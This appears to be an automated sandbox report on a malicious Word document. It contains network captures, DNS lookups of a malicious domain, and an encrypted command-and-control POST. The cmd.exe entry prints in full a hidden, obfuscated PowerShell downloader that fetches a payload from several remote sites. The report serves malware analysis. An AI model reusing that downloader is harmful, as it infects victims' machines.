                                            Jan 7, 2021 13:43:21.348145008 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.589004040 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589060068 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589097977 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589137077 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589145899 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.589175940 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589186907 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.589225054 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589268923 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589272976 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.589306116 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589346886 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589349985 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.589420080 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.589492083 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826329947 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826390028 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826420069 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826452017 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826491117 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826529026 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826565981 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826612949 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826625109 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826654911 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826662064 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826668978 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826694965 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826709986 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826734066 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826771021 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826786041 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826807022 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826843977 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826859951 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826880932 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826926947 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.826931953 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.826968908 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.827006102 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.827018976 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.827043056 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.827080965 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:21.827096939 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:21.829165936 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064307928 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064367056 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064408064 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064446926 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064482927 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064507008 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064529896 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064542055 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064572096 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064575911 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064610004 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064656019 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064660072 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064692974 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064728975 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064742088 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064765930 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064805984 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064816952 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064853907 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064894915 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064909935 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.064932108 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064970016 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.064984083 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065007925 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065043926 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065057993 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065082073 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065119982 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065130949 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065169096 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065208912 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065224886 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065247059 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065284014 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065298080 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065321922 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065356970 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065371990 CET49165443192.168.2.2245.119.81.203
                                            Jan 7, 2021 13:43:22.065433979 CET4434916545.119.81.203192.168.2.22
                                            Jan 7, 2021 13:43:22.065474033 CET4434916545.119.81.203192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 7, 2021 13:43:18.623842955 CET5219753192.168.2.228.8.8.8
                                            Jan 7, 2021 13:43:18.994874001 CET53521978.8.8.8192.168.2.22
                                            Jan 7, 2021 13:43:20.033886909 CET5309953192.168.2.228.8.8.8
                                            Jan 7, 2021 13:43:20.081928968 CET53530998.8.8.8192.168.2.22
                                            Jan 7, 2021 13:43:20.087475061 CET5283853192.168.2.228.8.8.8
                                            Jan 7, 2021 13:43:20.135555983 CET53528388.8.8.8192.168.2.22
                                            Jan 7, 2021 13:43:20.615420103 CET6120053192.168.2.228.8.8.8
                                            Jan 7, 2021 13:43:20.663501024 CET53612008.8.8.8192.168.2.22
                                            Jan 7, 2021 13:43:20.668745041 CET4954853192.168.2.228.8.8.8
                                            Jan 7, 2021 13:43:20.716762066 CET53495488.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 7, 2021 13:43:18.623842955 CET192.168.2.228.8.8.80x71ddStandard query (0)dagranitegiare.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 7, 2021 13:43:18.994874001 CET8.8.8.8192.168.2.220x71ddNo error (0)dagranitegiare.com45.119.81.203A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 167.71.148.58
                                              • 167.71.148.58:443

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249171167.71.148.58443C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 7, 2021 13:44:41.621895075 CET320OUTPOST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1
                                            DNT: 0
                                            Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
                                            Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXh
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 167.71.148.58:443
                                            Content-Length: 6868
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 7, 2021 13:44:42.530304909 CET329INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Thu, 07 Jan 2021 12:44:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 63 36 34 0d 0a 0a 82 0e ee 43 c4 48 f9 26 df 74 c1 e2 45 a4 7e 21 6f 77 d0 75 13 23 1f 38 7a 2c 67 bf f3 87 d9 3c 2b ab 31 4a e1 94 44 4a 71 82 fa db 89 f1 d4 64 45 28 c4 f7 18 26 ad 26 b1 9e ff e6 33 d0 a2 c4 dd 43 05 a8 65 79 bd 5e 2e 6a fb 7c 3d f7 55 84 0c b4 2b 78 18 0f 07 73 b4 e3 37 83 65 be 28 44 66 e8 e3 7f 8d b3 60 6b f2 3f 0d db 65 57 1f 76 62 e2 f2 89 05 f1 58 10 8b ab 4b 9b bd 77 3b 8f b3 e6 f7 c7 5d 8d 80 4c 09 03 86 d1 20 b7 34 f7 9a 52 af b1 03 58 7b f0 5f c5 c9 aa 1f b8 65 ba 9b 98 84 98 44 0b 40 ec 32 17 e7 fa e1 be 55 d5 27 db 9f 49 5c 9e d6 fd 6b 2d 5e 6c 94 fc 04 fb cf 39 19 34 84 25 ba 01 f1 59 d4 22 44 c4 7c 19 0e 78 4d 40 63 29 a3 e4 e8 f1 6d cb 09 51 4a 9c bb 3c 49 7c 23 57 7d 8a b9 99 20 c2 4d 2f 0e 7e a4 f9 ac 5d 10 96 4d 8a 39 81 dd b9 82 70 02 a6 00 27 2a d5 bf fe 3c c8 8c 11 2b 9c 2e 7b 1e 99 c1 4a e6 07 6d 80 6e 14 ab 86 ce bf 10 2f 62 65 05 98 17 e8 b7 45 8a 3c 59 82 7e 06 3d 46 14 b9 5c 9f 9f 7b 36 61 94 a2 bc a8 be 01 92 b7 c9 5f d7 bd c1 a9 40 ed 1d 1a 8f be 14 74 cc 7f e0 c1 a1 2c 2e 50 53 75 a7 ee e1 2f 3a d7 b8 e3 ea f3 30 81 d1 d6 07 21 95 36 37 09 6f d5 bc 95 90 c3 44 29 8f 4c 14 e2 81 45 c8 f5 ad 5f 15 87 25 90 08 88 9b 01 af f4 9f 77 c4 1e c4 1b 1a 09 6f 3f d4 62 3e f5 97 36 83 84 b1 77 94 d1 c1 6c 26 e5 c9 78 b5 d5 d5 ff 56 9f ae c4 21 0b 50 51 dc f9 14 8e 24 f6 27 51 88 c8 46 9b 97 57 59 20 c8 95 28 d5 44 de 5f 41 23 b8 60 50 94 a1 47 fe f6 42 13 56 2b 1a d3 eb 4f 86 b0 e3 e3 fd 52 5d 1e 63 d2 3c 23 c2 16 21 63 7f 9b 5f 64 be 90 e2 aa c4 d2 c7 0a d0 37 d1 cf 1b ba 7b 1d 08 a3 41 3a 98 48 9a f9 4f 03 8e fb d7 e8 35 65 de a2 a7 cd af 24 98 18 fe 76 3c 6d 0b f1 e5 d9 29 de b1 58 00 6a 2e 7c c0 e9 dd b7 68 5b ee f3 75 c3 6c f4 0a 00 f8 af 29 80 4e 44 3c ba bb 38 e8 b1 2f 51 d1 bc 32 cf 99 a3 47 02 57 73 4d ee a7 6d 36 f5 38 36 15 39 8c 03 00 bd 33 be 13 5a b8 bd 39 b6 02 f7 0e 1c ea 81 90 03 0d 65 d1 ac 07 ca a6 e0 3a 84 47 09 40 6d f6 a4 59 ad 9c 88 72 5a a7 8b 28 82 b2 9f d3 32 c9 44 29 40 ca 9c 18 80 da 3a e0 2c 0b ba d9 25 75 b5 10 5e d2 b9 82 50 30 74 f7 89 72 02 d4 77 a5 bb 05 0a 01 3e 5e 8a 34 74 17 19 55 5c ae c0 4d 01 c4 6e 5a 6a a5 61 41 87 61 15 5b 56 7f 1d 1a 4c 38 1c d2 1d d2 22 ea e4 a9 99 4f d3 68 c1 b1 af 65 c6 89 8a 1f 72 29 6b f1 7d 01 c9 e2 19 cc dc e4 19 cb 7f 7e 8f df 20 6c 14 19 80 df 48 0b d4 7d f0 02 02 26 99 88 84 60 c7 8b 9d 62 f0 3e 58 c0 c7 84 48 2d d4 bf b7 be f7 b1 a1 18 f0 2e d0 20 a1 bb ad 40 34 d8 95 8c eb f2 76 54 db c4 c7 c4 31 a9 28 83 6b 4a 78 73 94 8d 2a 8e 75 a7 50 2d c2 8b 62 1f 87 5b 40 89 f1 52 49 f1 08 23 66 64 51 84 aa fd 33 92 19 f5 32 0f 49 7a f1 98 d0 ee 0a 01 3d 7a 1a 91 99 bf e4 fe 0b fd 0c 5c 66 6b ef d0 2f df 04 ee 38 11 fa 6c bd a3 84 6b c2 19 3c f2 b9 4a 6f 1a 67 5c a6 c8 e4 db 5f 51 ab 51 29 d3 3c b5 07 43 9c a1 89 27 2f 81 d5 63 5a 6d a7 43 34 c7 18 d5 38 64 44 b5 32 16 de 9d 6e bf 5b 58 14 65 1e 49 3b e9 2c 24 c7 51 ca a0 4c f3 57 fe 0a 73 4e 90 ab 00 cb 46 51 f9 0e 22 fa ab 80 bb 2b 62 ae 65 e8 ad 8f 03 11 1a 9c d6 87 d5 20 76 be 32 46 ed f5 9e 3b 66 7d 88 ca fd 2f b5 ae 2a ca 00 e5 e7 cd 47 63 cb 8c b5 da be 8d b7 5e 7a 91 9f b6 f7 56 74 94 1e 6a 25 b6 48 a9 38 23 f0 0c 71 1c a3 19 97 b6 a7 d0 0c 7d ed bb 8f b1 36 b4 4b 96 df 0b 15 8b b1 48 a1 38 9a 3a 65 33 1d bf 3d ff 9b 2f b3 de 2f d4 ee 9a 00 5f 64 d2 06 d2 91 2b 04 ab a4 c6 e4 27 9a 69 10 07 05 65 5b c6 2c c1 25 c7 15 26 62 97 15 4a 20 73 26 54 5c 9b e2 d5 5a 20 eb 4c ec e5 f8 dd a1 7a 56 17 dc d8 4d 90 0c 43 57 be 1d 7c fd b3 7c 34 39 92 b8
                                            Data Ascii: c64CH&tE~!owu#8z,g<+1JDJqdE(&&3Cey^.j|=U+xs7e(Df`k?eWvbXKw;]L 4RX{_eD@2U'I\k-^l94%Y"D|xM@c)mQJ<I|#W} M/~]M9p'*<+.{Jmn/beE<Y~=F\{6a_@t,.PSu/:0!67oD)LE_%wo?b>6wl&xV!PQ$'QFWY (D_A#`PGBV+OR]c<#!c_d7{A:HO5e$v<m)Xj.|h[ul)ND<8/Q2GWsMm68693Z9e:G@mYrZ(2D)@:,%u^P0trw>^4tU\MnZjaAa[VL8"Oher)k}~ lH}&`b>XH-. @4vT1(kJxs*uP-b[@RI#fdQ32Iz=z\fk/8lk<Jog\_QQ)<C'/cZmC48dD2n[XeI;,$QLWsNFQ"+be v2F;f}/*Gc^zVtj%H8#q}6KH8:e3=//_d+'ie[,%&bJ s&T\Z LzVMCW||49


                                            HTTPS Packets

                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                            Jan 7, 2021 13:43:19.523066044 CET45.119.81.203443192.168.2.2249165CN=dagranitegiare.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Dec 21 19:37:30 CET 2020 Wed Oct 07 21:21:40 CEST 2020Sun Mar 21 19:37:30 CET 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: WINWORD.EXE PID: 2228 Parent PID: 584

                                            General

                                            Start time:13:42:33
                                            Start date:07/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fd30000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: cmd.exe PID: 2492 Parent PID: 1220

                                            General

                                            Start time:13:42:36
                                            Start date:07/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoASgAnACkAKwAoACgAJwApACcAKwAnACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcASgAnACkAKQArACgAKAAnACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACkAKQArACcAdwAnACsAJwB3ACcAKwAnAHcAJwArACgAJwAuAGcAcgBlACcAKwAnAGEAJwApACsAJwB1ACcAKwAoACcAZABzACcAKwAnAHQAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAJwArACcAKAAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABkACcAKwAnAG8AJwArACcAYwBzACcAKQApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAnACkAKQArACgAKAAnACgARgBHAG4ASgAnACsAJwApACcAKwAnACgAJwArACcAMwAnACsAJwBzADIAKQAoAEAAaAB0AHQAcAA6AEoAKQAoACcAKQApACsAJwAzACcAKwAnAHMAJwArACgAKAAnADIAKQAoACcAKwAnAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGsAJwArACcAbwAnACkAKQArACcAcgAnACsAKAAnAGUAYQAnACsAJwBuAGsAJwArACcAaQBkACcAKQArACgAJwBzACcAKwAnAGUAZAAnACkAKwAoACcAdQAuAGMAJwArACcAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAoACcAKwAnAHcAcAAtAGMAbwAnACsAJwBuACcAKQApACsAKAAnAHQAZQBuACcAKwAnAHQAJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAMgBjACcAKwAnAFEAJwApACsAKAAoACcAVABoAEoAJwArACcAKQAnACkAKQArACgAKAAnACgAMwAnACsAJwBzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQABoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAJwArACcAMwBzADIAKQAoAEoAJwArACcAKQAnACsAJwAoACcAKQApACsAKAAnADMAcwAnACsAJwAyACcAKQArACcAKQAnACsAJwAoACcAKwAoACcAZQB4AHAAJwArACcAZQBkAGkAJwApACsAJwB0AGkAJwArACcAbwAnACsAKAAnAG4AcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALgBjACcAKwAnAG8AJwArACcAbQBKACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgAnACsAJwApACgAWABKACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAB0AHQAcAAnACsAJwBzADoASgAnACkAKQArACcAKQAnACsAJwAoACcAKwAoACgAJwAzAHMAJwArACcAMgApACcAKwAnACgASgAnACsAJwApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAJwApACkAKwAoACcAcwB1ACcAKwAnAHIAJwApACsAJwBpACcAKwAoACcAYQBnAHIAJwArACcAbwAnACkAKwAoACcAZgAnACsAJwByAGUAcwAnACsAJwBoAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAKAAnAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoAHMAZQAnACsAJwByAGUAJwApACkAKwAoACgAJwB2AGUAcgBzAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAE0AJwApACkAKwAnAFYARAAnACsAJwBqACcAKwAoACgAJwBJAEoAKQAoADMAcwAyACcAKwAnACkAKAAnACsAJwBAACcAKQApACsAKAAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAEoAKQAoADMAJwApACkAKwAnAHMAMgAnACsAKAAoACcAKQAnACsAJwAoAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGcAJwArACcAZQAnACsAJwBvAGYAJwApACkAKwAoACcAZgAnACsAJwBvAGcAJwApACsAJwBsAGUAJwArACgAJwBtAHUAcwAnACsAJwBpAGMAJwArACcALgAnACkAKwAoACgAJwBjAG8AbQBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwArACcAdwBwAC0AYQAnACsAJwBkACcAKQApACsAKAAoACcAbQBpACcAKwAnAG4AJwArACcASgApACgAJwApACkAKwAoACgAJwAzAHMAMgApACgAeAAnACsAJwBKACkAKAAzACcAKwAnAHMAMgApACcAKwAnACgAJwApACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwACcAKQArACgAKAAnAHMAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKABKACcAKQApACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzACcAKwAnADIAKQAoACcAKQApACsAKAAnAGQAJwArACcAYQBnACcAKQArACgAJwByACcAKwAnAGEAbgBpACcAKQArACcAdAAnACsAKAAnAGUAZwBpAGEAcgBlACcAKwAnAC4AYwBvACcAKwAnAG0ASgAnACkAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAJwAoACcAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtAGkAbgAnACkAKwAoACgAJwBKACcAKwAnACkAKAAnACkAKQArACcAMwAnACsAJwBzACcAKwAnADIAJwArACgAKAAnACkAJwArACcAKABqAEMASABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQApACkALgAiAFIAZQBQAGwAYQBgAEMAZQAiACgAKAAoACgAKAAnAEoAKQAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0A